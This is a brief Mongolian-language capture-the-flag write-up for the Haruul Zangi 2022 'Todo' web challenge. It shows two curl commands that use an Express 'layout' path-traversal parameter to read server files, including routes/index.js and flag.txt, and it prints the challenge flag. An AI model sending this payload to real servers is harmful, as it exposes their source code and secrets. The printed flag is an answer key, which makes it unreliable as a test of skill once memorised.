⚔️HZ-2022-Final-Todo

Web Exploitation | Javascript Vulnerability

За Todo даалгаврыг шууд нэрнээс нь хараад бас формуудыг нь хараад XSS байна гэж бодтол өөр цоорхой болж таарсан. Мэдээж шууд өөр халдлагыг туршиж үзэхгүйгээр XSS-г болж байгаа эсэхийг шалгаж үзсэн

http://todo.challenge.haruulzangi.mn:9911/

XSS болоогүй учраас жаахан stuck болсон л доо тэгээд юмыг яаж мэдхэв гээд ашигласан технологиудыг шалгаж үзэхэд ExpressJS, NodeJS, jQuery гэх мэт технологиуд байсан

Эхнээс нь ExpressJS exploit-г хай үзвэл Parameter, LFR гэх мэт ойлголтууд олдох бөгөөд дэлгэрэнгүй судлаад үзвэл:

curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{"profile":{"layout": "./../routes/index.js"}}' 'http://ctf.shoebpatel.com:9090/'

Энэхүү кодыг орлуулаад үзвэл:

curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{"profile":{"layout": "./../flag.txt"}}' 'todo.challenge.haruulzangi.mn:9911'

Энэхүү бодлогыг цаг дуусахаас 5 секундын өмнө бодож дууссан бөгөөд оруулж амжаагүй байдаг ххэ

Flag: HZ{YOU_have_DONE_your_TASK}